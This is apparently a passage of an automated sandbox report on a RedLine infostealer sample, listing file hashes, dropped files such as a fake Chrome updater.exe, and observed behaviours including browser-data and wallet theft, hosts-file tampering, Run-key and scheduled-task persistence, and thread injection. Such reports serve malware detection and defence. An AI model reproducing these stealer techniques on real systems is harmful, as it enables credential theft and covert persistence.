memory/2804-333-0x0000000000090000-0x00000000006C4000-memory.dmp

memory/2804-334-0x0000000074050000-0x000000007473E000-memory.dmp

memory/2804-335-0x00000000054A0000-0x00000000054E0000-memory.dmp

memory/2804-336-0x00000000054A0000-0x00000000054E0000-memory.dmp

memory/2804-337-0x00000000054A0000-0x00000000054E0000-memory.dmp

memory/2804-339-0x00000000054A0000-0x00000000054E0000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/776-341-0x0000000019B30000-0x0000000019E12000-memory.dmp

memory/776-342-0x00000000009C0000-0x00000000009C8000-memory.dmp

memory/776-343-0x000007FEF3040000-0x000007FEF39DD000-memory.dmp

memory/776-345-0x0000000000FB0000-0x0000000001030000-memory.dmp

memory/776-347-0x0000000000FB0000-0x0000000001030000-memory.dmp

memory/776-346-0x000007FEF3040000-0x000007FEF39DD000-memory.dmp

memory/776-348-0x0000000000FB0000-0x0000000001030000-memory.dmp

memory/776-350-0x000007FEF3040000-0x000007FEF39DD000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Session Storage\CURRENT~RFf78516b.TMP

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000002.dbtmp

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\DawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\DawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\63f0cac7b2db289e_0

MD5 7ccac6cfefe2c89194d4980c2f786781
SHA1 891d8d807f3fa3f935c1d4cc2d4a6b5804de7dd5
SHA256 7d423afd0c598d7076e8efdb8d187117ebb2e31ed3633fde883eb1154c228e1f
SHA512 999959fa2cadd929abb33ff28bda407b1ca98ceb6eb573e6f03a6652ebff18316f604f28b70d849f013adc63ceb9ef6dc7dcc201e15e3cb7dbafc5bc4688db5b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\60ae0d0fe9088cac_0

MD5 0527ab10f1505c9bbd7978acbda59a1f
SHA1 3242274f60455bb80453a88db993e53ae82efca7
SHA256 bbeb8c7ecf1db836c78cc0af18a737f8bbee7f80e2dec65f58e036359577c4e4
SHA512 2146c7ff5551beb8faa06db97a05e18168c8a4515d25e70ab11e7a8bf1abb3ec137cc16945378f451ac07a770560b1913e3fa26c577d21aa824080aa0aaf59b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\5ddeaca7fe64ca95_0

MD5 0bef125af853aedbeb78cf45335d8382
SHA1 904c8edec12bc82075470f80b3863ef95d7f7e52
SHA256 4b32883468368ba511a0511c1d5ebec6fac1dd37597803b8b919d04ba9b64211
SHA512 7e50d48e905caa290f1d5820dcb76aeb5d804a063b2e6cdceed7aafbea0d06299631574556340f270d4002a0a8054d94dacc6156433d706ebd42df6bbb3de952

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\5b76df05a935e848_0

MD5 221aaf409d24668f2c55042ec34ff10a
SHA1 209eab71b914ea197f0f8b3a1112afe6c467a28a
SHA256 1b4d2ed6796077bc8f88be5447eb6fdd089f546b1a87ffa2ab1cd29014a7b09c
SHA512 4f58cd05df192cb9f2e0569401774ba3e4c20376cdafdd2aa582c132fc30856eccabd3b5ee1da5194189253dff4d9a6e5edf1286aacd56b29866b6caf7171864

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\343f6993e27f1d39_0

MD5 8716fa41ae795d4d10c0247047db27ed
SHA1 aa03fc534901d83a46198287925836bc3a9d00a6
SHA256 a62edc325d37ca3b3325a01827b62b6287d6285406d15b04670a1bf7d9d2b46a
SHA512 9e6831fd2b08a773a05a3d5a6a2bbb569e3e68aa23353811a00b6ac0ca4f739319f4186987277c87826b4cfe6f30df03e776d3b4247021089934507749bf3741

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\2e64514b9cd267ab_0

MD5 9f6b9e4baba79efac04082fb9f7f399f
SHA1 a5f67fc0f28330dd35a59d1234c110d8cf7661ed
SHA256 6cce90e30abc17cc9c026c3e6131684d97e504de513a937897a478e4d9495289
SHA512 14e57c7b07404a86a562a6f8d324078861be0406a2ab8d14262e752f8672efb63a1a8b29a340a3d0dabc8a6267f75e14b4914ab46c6c5dd2475aae62ee05e925

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\17e99028d152eccd_0

MD5 722972bb6837c4a17488cee2566511b7
SHA1 5bff9a3dc24bb052303a3cb27e85195cbfa04d80
SHA256 f4376b3829af4864351c79f4127adedc7d96d6ed42f72c940e159fe47baab63f
SHA512 379132d51d29afeeca5793f0cb01adc5c81bf8377d700a0720081f68f8b81fc28db63334fbd97a9b3631ca33a68cc9fed4bc10dfdbae466fb5f96e49ea5f0527

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\14f1a0226c118853_0

MD5 f898f9782b16fac8af4cb385030eebc5
SHA1 e8a59a2223487ee96b9f202ef08a54de5249edec
SHA256 cf16aa7a4368f247f041ddcd1005937cc8f68fbf42036a3ed298c27afd3a258d
SHA512 391d65b17dba331c8e3b93552e8347f7b1e32a8b82280a7247c94a7b631ecb64fda770791ec00676e462c81751706f505d745f40df31e484e6881ec86efa951e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\06db5837b6c74111_0

MD5 0a1b143305da3626123f024f01f59cfc
SHA1 e784b56d7352384f0f9aca82cf5cfb0d920829fd
SHA256 5acae75fa863c33d46ebdec69fe5270c3181e69675aa653f80350a720f7906bf
SHA512 66c306e863fee8dc3630fd0bb8190562b24e019232cea158df51efc39045c336735bf2ac5b717f33964afac3749e87e70156b612f6b5f9bf14a146d46710755a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\056093a36a95204b_0

MD5 dbb07d982334799df12b525570f8f9ef
SHA1 9e0b5ff7e1c5400d97c1cf16f9276c27b48c208b
SHA256 9e9f29a00c4bc8057518d3e2c001747a3338af936aefca7f3ad247095114bb97
SHA512 757e57d0b06e98e203b1d4a8277b8062aa261dd97e3d7ad80e42a274ba41642af6fff40b22a86694e1fe77e2f1a3c013d1c7020ec73620a7e2ce37af0865138f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\index

MD5 8301c5aae1eb403047a9b5a7d734e53b
SHA1 b0da8c0a3bb213cf150be88b489b9ffdc60e904a
SHA256 9a3d268b7c839227acc6b4cc8ce59af52bba836d8bab8727ac0886337dfe75d3
SHA512 2841d50dc2ef3515b7680796eb55bfe503797323e08ecab1129e1dbb007011018d93e75c283c4a85dd5a9c519b56d7e557fb43ca4ad809b9a77ef2600c3ff234

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_00000c

MD5 f67dde285de5f831537c104e505e2f05
SHA1 9c967dd7e4b45de90af20983e78cbd315f7cc700
SHA256 918122ce975ea0a50f0da079028f0a059129d7fad0aeb7a4a52a13640a80dcae
SHA512 2762d03ab4e317fc1c08077ecf08e4c8f05be73abd18c441b2e4480b4b177c13f51056fce403997b9337739a1a180d114ddcd223109af815e38e046b9baa7845

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_00000b

MD5 9f1c899a371951195b4dedabf8fc4588
SHA1 7abeeee04287a2633f5d2fa32d09c4c12e76051b
SHA256 ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7
SHA512 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_00000a

MD5 2d52125a96fb5a7227c67848bc18f65c
SHA1 a3593c6d8e3b6b458b6bbc2c6423dc76e30a84a3
SHA256 61f3154c19e46e1989d6fadbfe20835d0c9fc47242dc5828e776e3ec667fda24
SHA512 5f151708007cb474e64e8968b1f6b5e5331c434cc237627c6c5c92d1894d020f476ad88461e35fbf383aa46750a9cdcaf3a2ac8fe90570753c73fcf17ac0cbe6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000009

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000008

MD5 c101a8ba729b894927d7d884e4be68a8
SHA1 4bf48f94ff4e50e81c9d83b641af74b3bed580a0
SHA256 544f08482a62485be4acbc443462b01fe16b408b3d154c0cb1ff921a453cee33
SHA512 77483a92abeed799dfb1e782988569875b29eccebfb14e5be353302849ea6f0ac6a6411a72d6da706ec3767a54f12907fd0bfa4646ad4ca1cf4e1e15fbe9a9ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000007

MD5 b1160b640d08bd188b6c5a78ee800615
SHA1 d04fa2c7708eb38571f8e109f4ddbd99d41d2384
SHA256 df0bc11b7504a84666b7b3551505f806fd1b133dc4c5918a0943830c220759e0
SHA512 88a62eade4b9bc3f06d480afc849658abd047e4b54aa8478e273ca27e7d06a111a000c7d93e6f4cc4fc6604abf6d54c6adfdd41c7191ba0c6594c7198c004b17

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000006

MD5 e91b3d1211e7622f704312f122595075
SHA1 166aa041246e63eea99a3aa76916d2659af597de
SHA256 a0c17c84003fe52ada362e9804f9d2eeb9ec380b4dc0ab3f58534f0bdf2023f2
SHA512 ea4ea36f8e15dc8bf3612fa4ee723ddd7372caefd342540f20cb66343edf8def292d45f70b1da7bd2ec8c389c59af3c1c56ec14baa9b5ea169958eec5bee1009

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000005

MD5 6a3bb9c5ba28ee73af6c1b53e281b0cf
SHA1 d96e403c99c1707f82ea29c2c1f134e792c64097
SHA256 2f5adfc38558162578ffe112229f10417fbc4b3df025d153d4e22a0c95177740
SHA512 6c4844f70969938339cb6716a834a79e1a8379459c87b983c2518b9cbb560cb2f101aff980f682989928523be6cdc99bde3bfd8137f9c54a58191b900b580fbf

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000004

MD5 a85760e677d33a66159db7acca59cf1a
SHA1 a88c27ae4a2dcf3078e57258912531287820492d
SHA256 f2b878fa60d99ed05ffa4fd136b2ec173e54b92e6da4bcbdf476b522b237410c
SHA512 f6e588a499d59f00941a48e70d03e232b551355bb7317f48251b49e72f5b1e52102b9e66dc4cc5106b4521673bcd8b404990b276dfaf1a4aa771d125cf5327db

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000003

MD5 1c50742a09e48311794bfe038c646329
SHA1 815522fb857f2674792b8a52c3f825433f4c51c4
SHA256 7c0ed906abfbc37a694315647ea58a7c76d8eeb04de019ffb5eb31343528624e
SHA512 1a7b722a2c5f74f8031fe8781061d05aa311a9f9eee94d3fbf9a0cf528d5ed6dc77d55d9186f7724791b469fed66a1f2b75b213fec2147925b373deb0cf341e9

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000002

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\data_3

MD5 50ea4a0728f24914a8a0e729e71f3377
SHA1 1b0c3e1cedb67885ce55345dc7706d1ffeddf1e7
SHA256 1b27345baf280ed46216cd74deacfa203e33727692ae200ab37150cd7eb15492
SHA512 abb3fd4c0f9e53d707835ac73d56b937166ccb5159efdea26551a9a6c44189ceadafab950572991e3bfaf2f4ed4a8c9f854b74e4aaf4bb4c37534f3fced1743e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\data_2

MD5 9985f90c7ea029b33e05ce2b98dc22d5
SHA1 31b2ac4c0c6cbd69e9c22a0dd0f1e10dd8f5ad92
SHA256 10e1b9152bd48922fa4b8e12a380113cf00a489192268d44690b00aff9209055
SHA512 2918307102a1e67c3baaae3bfaf45a5458d48146e48f413a636140ee01a43b2679b09bac2bfbdff78bed3906b1a9580a3520c8b712f20654ac34ac42a167df2f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\data_1

MD5 1b56537386dfe598b38e4e056447fa27
SHA1 2f8bd282bb1bbe3c8a34950b9418abc4f5099acf
SHA256 c5df3f53949a69708e74ad5b6065de6ef31cd55856bc8784d2b0cfcb4ffaf3d4
SHA512 f4cb44a22f1c3bd76813a4d040d9a07d326a15c83a14174e2a320af3347aff1c4d64c7d57e5a64f8a3f14a510c13a2fd12614c278c3f4892a85f842bd7a6090d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\data_0

MD5 80f59fb61bb31552a2d5e89a2d8fd9de
SHA1 09c7bbc40e4f3e5033110c5b5cbced77d53266e7
SHA256 1084202df41afa53a135753e89e6e037b94afea9efd482bcb8e8f30560c8bd65
SHA512 efbc221788a65cc61020c8d2b462de1a8f4a1720318a5095f54a91de6aa5b6001d2a3a09879eff0c001d22abe9ea30876e04c1edfd6c24dec14b7eca337ec62a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\chrome_debug.log

MD5 6cbfcb7da474c9ea83374259a938a13a
SHA1 a716e5a7e95ad4e0bd622a01eeff929db5ca13a0
SHA256 ac7a675543cd986674a31db4e927b89f0328d6f59972a2ebdc4cec43bb9a1741
SHA512 48a20c28e58a6dbe2deaf7e33d510fc061fbea7c8179fb2a0ee71058d8730a990789e194a739d36298d288b761b3c8d83ac2ace31a0f5d0500b8544248424c5b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Crashpad\settings.dat

MD5 bae13055297f9fc295e6bd3485ea2dd6
SHA1 d885bcad4a2ebe9c562ccffde7499fb644ffbd40
SHA256 b759f2cab3a849ac002bd0a9f25e8201e759e64494b675d83ed4690ec30abf9b
SHA512 7883574dca38a0424cb76dfa651ee80ffce2c830f3b47a3debe38853d7de267209914aa1f14398f89128a9af88a6ff6389ee9936df02fa9d77348e6949d8efed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\DevToolsActivePort

MD5 9c02a1aec5e58143cdcdc862ce2b0d7c
SHA1 dd489ec0411a1b169f603ae2b548c9bc4173044b
SHA256 55b1ec014f2aa713f99d4e7b1179adf049dfd254ca80a33fc79437789c70cf7e
SHA512 53044ffc914264ae186dc23313eb1fe3033b4f57780767e8a132cd654df85766139ccc7b1d6c5eaa10d0800b6c99da9287889549f5c7b1a1fc3ad0565045f4c0

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-10 18:29

Reported

2023-08-10 18:32

Platform

win10v2004-20230703-en

Max time kernel

145s

Max time network

158s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AppLaunch = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2888 set thread context of 1408 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2708 set thread context of 4544 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 2708 set thread context of 468 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
